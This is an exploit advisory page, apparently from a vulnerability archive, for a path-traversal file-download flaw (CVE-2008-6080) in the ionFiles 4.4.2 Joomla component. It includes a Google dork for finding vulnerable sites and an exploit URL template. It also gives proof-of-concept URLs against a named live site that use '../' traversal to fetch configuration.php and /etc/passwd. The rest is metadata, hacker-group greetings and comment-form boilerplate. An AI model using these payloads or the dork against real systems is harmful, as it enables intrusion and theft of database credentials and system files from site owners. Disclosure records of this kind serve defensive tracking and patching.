Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability

2009.02.08

Credit: Vrs-hCk

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-6080

CWE: CWE-22

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

[o]------------------------------------------------------------------------------------[x]
 |  Arbitrary File Download Vulnerability                                               |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
 |  Vendor   : http://forum.codecall.net/                                               |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[&#187;] Google Dork

    inurl:com_ionfiles

[&#187;] Vulnerable

    ./download.php
	
	Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[&#187;] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[&#187;] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,         |
 |  Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :))               |
[o]------------------------------------------------------------------------------------[o]

References:

http://xforce.iss.net/xforce/xfdb/46039

http://www.securityfocus.com/bid/31877

http://www.milw0rm.com/exploits/6809

http://secunia.com/advisories/32377

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.